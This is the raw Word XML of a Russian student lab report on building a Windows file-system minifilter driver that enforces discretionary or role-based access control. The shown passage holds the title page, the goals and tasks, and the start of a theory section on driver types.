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881F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2091C516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3429CD6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7D8767EC" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRPr="00E25F81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24D1E215" w14:textId="5110BDD5" w:rsidR="00E25F81" w:rsidRDefault="00E25F81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</w:rPr>
        <w:t>Высшая школа кибербезопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAAD30D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0A6F7F8E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727D184A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4419C771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2C051DEF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5B5A122B" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2977EC3D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78AEBA39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622B0348" w14:textId="300191DB" w:rsidR="00F3102D" w:rsidRPr="00E25F81" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:caps/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ЛАБОРАТОРНАЯ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> РАБОТА № </w:t>
      </w:r>
      <w:r w:rsidR="00E748AD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2729D49F" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="62"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F918B2" w14:textId="6AE92D20" w:rsidR="00F3102D" w:rsidRPr="00943A11" w:rsidRDefault="00F3102D" w:rsidP="00943A11">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="-143" w:firstLine="142"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943A11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00E748AD" w:rsidRPr="00E748AD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Реализация моделей безопасности в ОС Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00943A11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30353FEE" w14:textId="167B91A9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EB38E5" w:rsidRPr="00943A11">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>Модели безопасности компьютерных систем</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E24A15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5540B915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2F092FF9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0E823907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34D285A7" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:ind w:right="-2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5E35C8" w14:textId="2EEBA7D4" w:rsidR="00F3102D" w:rsidRDefault="00EB38E5" w:rsidP="0035662C">
      <w:pPr>
        <w:pStyle w:val="af9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="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Выполнил</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3841F287" w14:textId="45BCC391" w:rsidR="00F3102D" w:rsidRDefault="00EB38E5" w:rsidP="0035662C">
      <w:pPr>
        <w:pStyle w:val="af9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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студент</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> гр. 51</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81" w:rsidRPr="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1001/</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81" w:rsidRPr="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81" w:rsidRPr="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81" w:rsidRPr="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Глазырин </w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>А.</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Д</w:t>
      </w:r>
      <w:r w:rsidR="00F3102D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5501F9B6" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRPr="00933212" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:pStyle w:val="af9"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4746"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-2" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933212">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00933212">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>подпись</w:t>
      </w:r>
      <w:r w:rsidRPr="00933212">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D59EB2" w14:textId="77777777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</w:tabs>
        <w:spacing w:before="240" w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-2" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6935FBDC" w14:textId="77777777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</w:tabs>
        <w:spacing w:before="240" w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-2" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570C2806" w14:textId="4B5767D4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Пр</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>еподаватель</w:t>
      </w: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E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Овасапян</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Т</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E25F81">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Д</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086846C0" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRPr="00933212" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:pStyle w:val="af9"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4746"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-2" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933212">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;подпись&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236EDBB0" w14:textId="77777777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  <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEEC1A8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58883840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7CE2D094" w14:textId="34322B64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3B77D30" w14:textId="33A2A323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159484A" w14:textId="1000B7F9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69E8707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2468BC19" w14:textId="77777777" w:rsidR="00F3102D" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960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6104C826" w14:textId="7E125D7A" w:rsidR="00F3102D" w:rsidRDefault="00F3102D" w:rsidP="0035662C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21990AC9" w14:textId="77777777" w:rsidR="00943A11" w:rsidRDefault="00943A11" w:rsidP="0035662C">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-2" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7F3512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E23B029" w14:textId="27AE04B4" w:rsidR="00F3102D" w:rsidRDefault="00EB38E5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25F81">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2E10C" w14:textId="77777777" w:rsidR="006E3D3D" w:rsidRPr="006426CC" w:rsidRDefault="006E3D3D" w:rsidP="006426CC">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006426CC">
        <w:lastRenderedPageBreak/>
        <w:t>цель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE14A63" w14:textId="312AF276" w:rsidR="000D7F1F" w:rsidRPr="00E77A1F" w:rsidRDefault="008E6B50" w:rsidP="008E6B50">
      <w:pPr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Исследование принципов разработки моделей безопасности, функционирующих на уровне ядра ОС Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568D0C92" w14:textId="77777777" w:rsidR="008E6B50" w:rsidRPr="00E77A1F" w:rsidRDefault="008E6B50" w:rsidP="008E6B50">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA72582" w14:textId="44C8D407" w:rsidR="00E25F81" w:rsidRPr="006426CC" w:rsidRDefault="006E3D3D" w:rsidP="006426CC">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006426CC">
        <w:t>задачи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ACC9F0" w14:textId="77777777" w:rsidR="008E6B50" w:rsidRDefault="008E6B50" w:rsidP="008E6B50">
      <w:pPr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Разработать драйвер-фильтр для ОС Windows 7/8/8.1/10/11, позволяющий ограничить права доступа процессов к объектам файловой системы. Разграничение должно осуществляться по правилам Дискреционной модели доступа/Ролевой модели доступа (в зависимости от варианта).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBF293" w14:textId="77777777" w:rsidR="008E6B50" w:rsidRDefault="008E6B50" w:rsidP="008E6B50">
      <w:pPr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В ходе выполнения лабораторной работы необходимо выполнить следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425CAF0" w14:textId="77777777" w:rsidR="008E6B50" w:rsidRDefault="008E6B50" w:rsidP="008E6B50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851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Исследовать методы разработки драйверов для ОС Windows, изучить типы драйверов файловой системы, выбрать подходящий тип драйвера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E75BB6" w14:textId="77777777" w:rsidR="008E6B50" w:rsidRDefault="008E6B50" w:rsidP="008E6B50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851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Подготовить среду разработки, которая включает в себя Visual Studio, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Window</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Driver Kit (WDK), Software Development Kit (SDK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB63F25" w14:textId="77777777" w:rsidR="008E6B50" w:rsidRDefault="008E6B50" w:rsidP="008E6B50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851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Подготовить целевую ОС, на которой будет работать разработанный драйвер, для возможности установки неподписанных драйверов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A122BF" w14:textId="77777777" w:rsidR="008E6B50" w:rsidRDefault="008E6B50" w:rsidP="008E6B50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851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Изучить существующие проекты драйверов. Выбрать наиболее подходящий для поставленной задачи и скомпилировать его.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BEA49F" w14:textId="77777777" w:rsidR="008E6B50" w:rsidRDefault="008E6B50" w:rsidP="008E6B50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851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Разработать простейшую программу, позволяющую читать и записывать в текстовый файл данные. Название файла и данные для записи подаются в качестве аргументов командной строки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE3A2E" w14:textId="77777777" w:rsidR="008E6B50" w:rsidRDefault="008E6B50" w:rsidP="008E6B50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851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Доработать выбранный драйвер до возможности блокировки запросов от процессов к файлам в определенной директории. Доступ процесса к файлу должен определяться моделью контроля доступа и правами, указанными в отдельном текстовом файле (конфигурационный файл). В качестве процесса выступает разработанная в п.5 программа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A24C5" w14:textId="7B417BD1" w:rsidR="000D7F1F" w:rsidRDefault="000D7F1F" w:rsidP="00943A11">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE465A8" w14:textId="3ADA35E6" w:rsidR="006E3D3D" w:rsidRDefault="00437BF0" w:rsidP="006426CC">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A44886F" w14:textId="035184B9" w:rsidR="00A45FA1" w:rsidRPr="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Типы драйверов файловой системы </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBEB081" w14:textId="7263D0C7" w:rsidR="00F42C40" w:rsidRDefault="00A95B4E" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve">Полноценные драйверы файловой системы (FSD </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve"> File System </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Drivers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DC930F" w14:textId="432D3FE1" w:rsidR="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A95B4E">
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Данный тип драйверов отвечает за физическую организацию данных на носителе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04777166" w14:textId="49ADB2B9" w:rsidR="00A95B4E" w:rsidRPr="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A95B4E">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Примеры: Ntfs.sys, Fastfat.sys, exfat.sys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754613F1" w14:textId="74A22273" w:rsidR="00A95B4E" w:rsidRPr="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A95B4E">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Задачи: Операционная система мыслит категориями "Файл" и "Папка". А жесткий диск мыслит категориями "Блок", "Сектор" и "Дорожка". FSD выполняет трансляцию высокоуровневых абстракций в физические адреса на диске. Он управляет структурами данных (например, таблицей MFT в NTFS), кэшированием файлов, фрагментацией и метаданными.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C78061B" w14:textId="053E784B" w:rsidR="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A95B4E">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve">Сложность разработки: Создание нового FSD требуется только в том случае, если разрабатывается принципиально новая файловая система (как это было с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>ReFS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve"> от Microsoft).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432AC962" w14:textId="77777777" w:rsidR="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A95B4E">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5299EBEE" w14:textId="6CDE0784" w:rsidR="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve">Классические драйверы-фильтры (Legacy Filter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Drivers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A0556" w14:textId="7185F625" w:rsidR="00A95B4E" w:rsidRPr="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A95B4E">
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Эт</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и драйверы </w:t>
      </w:r>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>времен Windows NT/2000/XP. Если разработчику антивируса нужно было перехватить открытие файла, он писал Legacy-фильтр.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA00BC4" w14:textId="2A029DAC" w:rsidR="00A95B4E" w:rsidRPr="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A95B4E">
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve">Драйвер прикреплял себя поверх FSD (например, над Ntfs.sys) с помощью функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>IoAttachDeviceToDeviceStack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve">. Он перехватывал сырые IRP-пакеты (I/O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Packets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>), идущие от Диспетчера ввода-вывода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F06320" w14:textId="67668BE1" w:rsidR="00A95B4E" w:rsidRPr="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A95B4E">
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve">Главная проблема (Почему от них отказались): Анархия. Порядок загрузки драйверов было невозможно контролировать. Антивирус "А", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>криптопровайдер</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve"> "Б" и система квотирования "В" пытались прикрепиться к одному стеку. Они конфликтовали, перехватывали пакеты друг у друга, что приводило к взаимным блокировкам (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Deadlocks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>) и знаменитым синим экранам смерти (BSOD). Разработчику приходилось писать огромное количество шаблонного кода просто для передачи IRP-пакета дальше по цепочке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6917A574" w14:textId="40232544" w:rsidR="00A95B4E" w:rsidRPr="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A95B4E">
      <w:r w:rsidRPr="00A95B4E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Статус сейчас: Технология признана </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Deprecated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve"> (устаревшей). Начиная с Windows 10, Microsoft активно запрещает загрузку таких драйверов в ядро.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1329A6" w14:textId="77777777" w:rsidR="00A95B4E" w:rsidRPr="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A95B4E"/>
    <w:p w14:paraId="0415CAEE" w14:textId="7C8F5259" w:rsidR="00F42C40" w:rsidRDefault="00A95B4E" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Драйверы-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>минифильтры</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Minifilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>Drivers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F91F47B" w14:textId="54D1DEBC" w:rsidR="00897378" w:rsidRPr="00897378" w:rsidRDefault="00A95B4E" w:rsidP="00897378">
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve">Microsoft создала единый фильтр </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="00A95B4E">
        <w:t xml:space="preserve">Filter Manager (FltMgr.sys). Теперь к стеку файловой системы крепится только он один. А уже к нему, через удобный API, подключаются </w:t>
      </w:r>
      <w:r>
